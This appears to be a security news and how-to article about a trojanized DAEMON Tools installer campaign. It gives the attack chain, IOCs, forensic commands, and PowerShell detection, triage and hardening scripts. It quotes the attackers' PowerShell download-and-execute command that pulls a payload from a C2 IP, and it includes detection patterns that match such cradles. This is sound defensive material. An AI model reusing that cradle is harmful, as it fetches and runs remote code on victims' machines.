URGENT: DAEMON Tools Supply Chain Attack—Check Your PC NOW (Over 100 Countries HIT) + Video

Introduction

In early May 2026, Kaspersky’s Global Research and Analysis Team (GReAT) identified an active supply chain attack that had compromised the official installers of DAEMON Tools, a widely used disk emulation utility. The compromise began on April 8, 2026, and for nearly a month the vendor’s legitimate website served trojanized installers that still carried the vendor’s valid digital signature. The attack sidesteps perimeter and signature-based defences by abusing the implicit trust that users and security tools place in signed, official downloads; it produced thousands of infection attempts across more than 100 countries, with targeted follow-up activity observed against government, scientific, manufacturing, and retail organizations in Russia, Belarus, and Thailand.

Learning Objectives

  • Understand the technical details of the multi-stage DAEMON Tools supply chain compromise and the three trojanized binaries.
  • Identify Indicators of Compromise (IOCs) and conduct system audits to detect the presence of the backdoor and QUIC RAT.
  • Execute containment, eradication, and recovery procedures in both Windows and mixed-OS environments.

You Should Know

1. Anatomy of the Compromise: From Signed Installer to QUIC RAT

The attackers successfully compromised DAEMON Tools versions 12.5.0.2421 through 12.5.0.2434, planting malicious code into three core binaries within the installation directory: DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe.
Because disk emulation software needs low‑level system access, users typically grant it administrative privileges, giving the embedded malware a deep, persistent foothold. The tampered files remained signed with AVB Disc Soft’s valid digital certificate, making them appear completely legitimate.

Step‑by‑step attack chain:

  1. Initial Execution – Upon machine startup, the compromised binary runs and activates a backdoor embedded in the C Runtime (CRT) initialization code.
  2. C2 Communication – The backdoor sends HTTP GET requests to a typosquatted C2 domain, `env-check.daemontools[.]cc` (registered on March 27, 2026).
  3. First-Stage Payload – The C2 server replies with a shell command that downloads and executes an information collector (envchk.exe). The observed command template, as reproduced here (the URL path and the dropped file name are not fully preserved), is:
    cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/','C:\Windows\Temp.exe')"&& %TEMP%\ &&del %TEMP%.exe
    Note that the download runs through `powershell -Command`, not a script file, so PowerShell execution policy never applies to it.

  4. System Profiling – This .NET executable (SHA1: 2d4eb55b01f59c62c6de9aacba9b47267d398fe4) collects extensive system data, including MAC addresses, hostnames, DNS domain names, running processes, and system locales.

  5. Targeted Post‑Compromise – The attackers manually reviewed the profiling data and selected only about a dozen high‑value machines for further exploitation. These received a minimalistic backdoor via a shellcode loader that decrypts its payload with RC4 and executes it directly in memory.

  6. QUIC RAT Deployment – On the most valuable targets (notably a Russian educational institution), attackers deployed QUIC RAT, a sophisticated C++ backdoor statically linked with the WolfSSL library. It supports HTTP/3 and QUIC protocols and injects malicious code into `notepad.exe` and `conhost.exe` to evade detection.
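The chain above gives a defender one high-signal artifact: the first-stage download cradle, which Script Block Logging records as Event ID 4104 regardless of execution policy. The following PowerShell is an added example (not code from Kaspersky’s report or from this page’s author) that scores a script block against the observable pieces of that cradle. The sample script blocks are constructed; the URL path and file name in them are placeholders, since neither is fully reproduced in the reporting.

```powershell
# Added example: flag the download-and-execute cradle pattern from the attack
# chain in PowerShell Script Block Logging (Event ID 4104) text.
function Test-DownloadCradle {
    param([Parameter(Mandatory)][string]$ScriptBlockText)

    $hits = [System.Collections.Generic.List[string]]::new()

    # Each indicator maps to one observable in the reported command template.
    # Only 'Known C2 IP' is specific to this campaign; the rest are generic.
    $indicators = [ordered]@{
        'WebClient download' = 'New-Object\s+System\.Net\.WebClient|\.DownloadFile\('
        'Raw IP URL'         = 'https?://\d{1,3}(\.\d{1,3}){3}'
        'Known C2 IP'        = '38\.180\.107\.76'
        'Drop to TEMP'       = '%TEMP%|\\Windows\\Temp\b'
        'Self-delete'        = '\bdel\s+%TEMP%'
    }
    foreach ($name in $indicators.Keys) {
        if ($ScriptBlockText -match $indicators[$name]) { $hits.Add($name) }
    }

    # Two or more generic indicators together, or the known C2 IP alone, is a hit.
    [pscustomobject]@{
        Suspicious = ($hits.Count -ge 2) -or ($hits -contains 'Known C2 IP')
        Indicators = $hits.ToArray()
    }
}

# Constructed sample script blocks: one modelled on the reported cradle
# (placeholder path 'x' and file name 'x.exe'), one benign.
$samples = @(
    "`$wc=New-Object System.Net.WebClient;`$wc.DownloadFile('http://38.180.107.76/x','C:\Windows\Temp\x.exe')",
    "Get-ChildItem C:\Users | Measure-Object"
)
foreach ($s in $samples) { Test-DownloadCradle -ScriptBlockText $s | Format-List }

# Live use on a host with Script Block Logging enabled: Properties[2] of a
# 4104 event is the ScriptBlockText field.
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#     ForEach-Object { Test-DownloadCradle -ScriptBlockText $_.Properties[2].Value } |
#     Where-Object Suspicious
```

The first sample reports four indicators and `Suspicious = True`; the benign one reports none. The generic indicators are deliberately broad (a raw-IP URL plus a drop to a temp directory is how most cradles look), so in production they belong in a SIEM rule with a threshold rather than an automatic block.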

2. Detecting and Investigating the Breach (Windows Forensics)

After identifying potentially compromised hosts, security teams must conduct a thorough forensic investigation to determine the scope and impact.

Step‑by‑step investigation guide (Windows):

  1. Inventory DAEMON Tools Installations – Find every machine with the software installed. `Win32_Product` works, but enumerating it triggers a consistency check (and sometimes a repair) of every installed MSI package on the host, and `-like` needs wildcards to match the product names:
Get-WmiObject -Class Win32_Product | Where-Object {$_.Name -like "*DAEMON Tools*"} | Select-Object PSComputerName, Name, Version
  2. Check for Compromised Binaries – Record the signature details and hashes of the three key files. Because the trojanized builds carry AVB Disc Soft’s valid certificate, a `Valid` signature status does not clear a file; compare the hash against the vendor’s clean release and the published IOCs:
Get-AuthenticodeSignature -FilePath "C:\Program Files\DAEMON Tools Lite\DTHelper.exe"
Get-FileHash "C:\Program Files\DAEMON Tools Lite\DTHelper.exe" -Algorithm SHA256
  3. Search for the Information Collector (envchk.exe) – Search the disk and the process list for the known malicious executable (the `dir` line is for cmd.exe, the others for PowerShell and wmic):
dir C:\envchk.exe /s /b
Get-Process -Name envchk -ErrorAction SilentlyContinue | Select-Object Id, Path
wmic process where "name='envchk.exe'" get processid,executablepath
  4. Analyze Network Connections – Search for connections to the known IP address and for DNS queries to the typosquatted domain (Sysmon Event ID 22), using `netstat` or PowerShell. Drop the `[.]` defanging when matching real logs:
netstat -ano | findstr "38.180.107.76"
Get-NetTCPConnection | Where-Object {$_.RemoteAddress -eq "38.180.107.76"}
Get-WinEvent -FilterHashtable @{LogName="Microsoft-Windows-Sysmon/Operational"; Id=22} | Where-Object { $_.Message -like "*env-check.daemontools.cc*" }
  5. Collect Relevant Evidence – For deeper analysis, preserve the following artifacts and submit them to a sandbox or malware analysis team:
  • Compromised installers (versions 12.5.0.2421 through 12.5.0.2434)
  • `envchk.exe`, if found on disk
  • PowerShell script block logs (Event ID 4104) covering the infection window
  • Network traffic captures containing connections to the C2 infrastructure
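The five steps above are easier to run consistently as one triage function that returns a single report object per host. The script below is an added example, not the page’s or the vendor’s code. The version range, binary names, IP and domain are the ones stated in the report; the install path `C:\Program Files\DAEMON Tools Lite` is the page’s assumption for a default install, and the Uninstall registry keys are used instead of `Win32_Product` to avoid the MSI reconfiguration side effect.

```powershell
# Added example: single-host triage for the DAEMON Tools compromise.
function Get-DaemonToolsTriage {
    $affectedMin = [version]'12.5.0.2421'
    $affectedMax = [version]'12.5.0.2434'
    $c2Ip        = '38.180.107.76'
    $c2Domain    = 'env-check.daemontools.cc'
    $binaries    = 'DTHelper.exe', 'DiscSoftBusServiceLite.exe', 'DTShellHlp.exe'

    # 1. Installed versions from the Uninstall keys (64- and 32-bit views).
    $installs = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    ) | ForEach-Object { Get-ItemProperty -Path $_ -ErrorAction SilentlyContinue } |
      Where-Object { $_.DisplayName -like '*DAEMON Tools*' } |
      ForEach-Object {
          $v = $null
          $parsed = [version]::TryParse([string]$_.DisplayVersion, [ref]$v)
          [pscustomobject]@{
              Name        = $_.DisplayName
              Version     = $_.DisplayVersion
              InstallPath = $_.InstallLocation
              InRange     = $parsed -and ($v -ge $affectedMin) -and ($v -le $affectedMax)
          }
      }

    # 2. Signature state and SHA-256 of the three trojanized binaries. A 'Valid'
    #    status does not clear a file: the tampered builds were signed with the
    #    vendor's own certificate, so the hash is what gets compared against the
    #    clean release and published IOC lists.
    $roots = @($installs | ForEach-Object InstallPath | Where-Object { $_ }) +
             'C:\Program Files\DAEMON Tools Lite' | Select-Object -Unique   # assumed default path
    $fileReport = foreach ($root in $roots) {
        foreach ($b in $binaries) {
            $p = Join-Path $root $b
            if (Test-Path $p) {
                $sig = Get-AuthenticodeSignature -FilePath $p
                [pscustomobject]@{
                    Path      = $p
                    SHA256    = (Get-FileHash $p -Algorithm SHA256).Hash
                    SigStatus = $sig.Status
                    Signer    = $sig.SignerCertificate.Subject
                }
            }
        }
    }

    # 3. The information collector, on disk in the temp directories the cradle
    #    uses, or still running.
    $collector = @(
        Get-ChildItem -Path $env:TEMP, "$env:SystemRoot\Temp" -Filter 'envchk.exe' -Recurse -ErrorAction SilentlyContinue |
            Select-Object -ExpandProperty FullName
        Get-Process -Name envchk -ErrorAction SilentlyContinue |
            ForEach-Object { "running PID $($_.Id): $($_.Path)" }
    )

    # 4. Live connections to the C2 IP and Sysmon DNS-query events (ID 22) for
    #    the typosquatted domain. Requires Sysmon with DnsQuery logging enabled.
    $net = Get-NetTCPConnection -RemoteAddress $c2Ip -ErrorAction SilentlyContinue |
        Select-Object LocalPort, RemotePort, State, OwningProcess
    $dns = Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=22} -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -like "*$c2Domain*" } |
        Select-Object TimeCreated,
            @{n='Detail'; e={ (($_.Message -split "`r?`n") -match '^(QueryName|Image):') -join '; ' }}

    # 5. One report object per host; NeedsContainment drives the next step.
    [pscustomobject]@{
        ComputerName     = $env:COMPUTERNAME
        Installs         = $installs
        Binaries         = $fileReport
        Collector        = $collector
        C2Connections    = $net
        C2DnsQueries     = $dns
        NeedsContainment = [bool](($installs | Where-Object InRange) -or $collector -or $net -or $dns)
    }
}

Get-DaemonToolsTriage | ConvertTo-Json -Depth 4
```

Run it elevated so the Sysmon log and every process path are readable. The `Binaries` hashes are the evidence to keep alongside the artifacts listed in step 5; `NeedsContainment` is true for any host that has an affected version, the collector, or C2 traffic, which is the set to isolate first.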

3. Building Resilience: Proactive Hardening for Linux, Windows, and Cloud

Organizations must treat this event as a case study and implement controls to mitigate future supply chain attacks, regardless of operating system.

Step‑by‑step proactive hardening:

  1. Constrain PowerShell (Windows) – Execution policy is a safety feature, not a security boundary: it governs script files only, and the observed cradle ran through `powershell -NoProfile -Command "..."`, which it never checks. Use AppLocker or Windows Defender Application Control to restrict what can run, and enable Script Block Logging so that Event ID 4104 captures such commands. Setting the policy still stops accidental execution of unsigned scripts, but do not rely on it:
Set-ExecutionPolicy Restricted -Scope LocalMachine
  2. Monitor Linux Binary Integrity – Use `AIDE` (Advanced Intrusion Detection Environment) to baseline critical system binaries and detect unauthorized changes. On Debian-based systems `aideinit` writes the baseline to `/var/lib/aide/aide.db.new`, which must be moved into place before checks run against it:
sudo aideinit
sudo cp /var/lib/aide/aide.db.new /var/lib/aide/aide.db
sudo aide --check
  3. Implement DNS and Egress Filtering – Block the typosquatted domain at the DNS level and the IP address at the firewall (a DNS sinkhole cannot block an IP, and the cradle fetches its payload by raw IP):
env-check.daemontools[.]cc   (DNS sinkhole or resolver blocklist)
38.180.107[.]76              (egress firewall deny)
  4. Adopt Software Bill of Materials (SBOM) – Generate and maintain an SBOM for all third-party software to track dependencies and versions, making it easier to identify vulnerable components.

  5. Enforce Least Privilege – Do not run everyday software with administrative privileges. Use standard user accounts and implement just-in-time (JIT) privilege elevation mechanisms.

  6. Harden Build Pipelines (DevOps) – For organizations that develop software, protect signing keys using hardware security modules (HSMs) and implement multi‑party authorization for build and release processes.
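Applied to this incident, the Windows-side controls from steps 1 and 3 look like the script below. It is an added example rather than the page’s own configuration: the IOCs are the report’s, while the rule names, the `127.0.0.1` sinkhole address and the exact-FQDN NRPT match are this example’s choices. It must run elevated, and each control is guarded so that re-running it does not create duplicate rules.

```powershell
# Added example: host-level controls that would have affected the observed
# chain, in place of relying on Set-ExecutionPolicy.
$c2Domain = 'env-check.daemontools.cc'
$c2Ip     = '38.180.107.76'
$fwName   = 'DAEMON Tools C2 block'
$sblKey   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Enable-C2Hardening {
    # Script Block Logging records the cradle's text as Event ID 4104 even when
    # it arrives via 'powershell -Command', which execution policy ignores.
    New-Item -Path $sblKey -Force | Out-Null
    Set-ItemProperty -Path $sblKey -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # Sinkhole the typosquatted C2 domain on the client resolver (NRPT) so the
    # backdoor's HTTP GET never resolves. 127.0.0.1 is the example's choice of
    # name server; nothing should answer DNS there.
    if (-not (Get-DnsClientNrptRule | Where-Object Namespace -eq $c2Domain)) {
        Add-DnsClientNrptRule -Namespace $c2Domain -NameServers '127.0.0.1' -Comment 'DAEMON Tools C2 sinkhole'
    }

    # The cradle fetches its payload by raw IP, which DNS filtering cannot stop;
    # deny it at the host firewall as well.
    if (-not (Get-NetFirewallRule -DisplayName $fwName -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $fwName -Direction Outbound -RemoteAddress $c2Ip `
            -Action Block -Profile Any | Out-Null
    }
}

function Test-C2Hardening {
    # Returns $true per control so the state can be checked from a baseline job.
    [pscustomobject]@{
        ScriptBlockLogging = ((Get-ItemProperty -Path $sblKey -ErrorAction SilentlyContinue).EnableScriptBlockLogging -eq 1)
        NrptSinkhole       = [bool](Get-DnsClientNrptRule | Where-Object Namespace -eq $c2Domain)
        FirewallBlock      = [bool](Get-NetFirewallRule -DisplayName $fwName -ErrorAction SilentlyContinue)
    }
}

Enable-C2Hardening
Test-C2Hardening
```

`Test-C2Hardening` should report `True` for all three fields afterwards. The NRPT and firewall entries are reactive blocks for known infrastructure; the durable control is the allow-listing (AppLocker or WDAC) named in step 1, which these IOC blocks complement rather than replace.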

What Undercode Say

  • Supply chain attacks are now among the most prevalent threats. With nearly 19,500 malicious packages detected in open-source projects by the end of 2025 (a 37% year-over-year increase), relying on vendor reputation is no longer sufficient.

  • Digital signatures are not a guarantee of safety. The DAEMON Tools incident shows that a valid code-signing certificate, once stolen or misused, lulls users and security tools into a false sense of security. Signature verification must be complemented with behavioral analysis.

  • Targeted post-compromise activity is efficient and dangerous. The attackers’ ability to manually sift through thousands of infections to deploy secondary payloads on a dozen specific machines demonstrates a surgical, intelligence-driven approach that maximizes impact while minimizing exposure.

Prediction

This attack heralds a new normal for software supply chain breaches. Threat actors will increasingly target widely distributed, system‑level utilities (disk emulators, VPN clients, and development tools) because their privileged access requirements provide immediate, deep‑level compromise. We will likely see a rise in attacks delivered through validly signed binaries that abuse stolen or compromised certificates to bypass traditional antivirus and endpoint detection. Consequently, the industry will pivot toward immutable infrastructure, zero‑trust software distribution (e.g., using The Update Framework, TUF), and runtime behavioral monitoring. Within 12–18 months, major operating systems and software vendors may implement mandatory SBOM attestation and runtime code integrity verification, making it significantly harder for attackers to weaponize trusted software at scale.

Reported By: Cybersecuritynews Malware – Hackers Feeds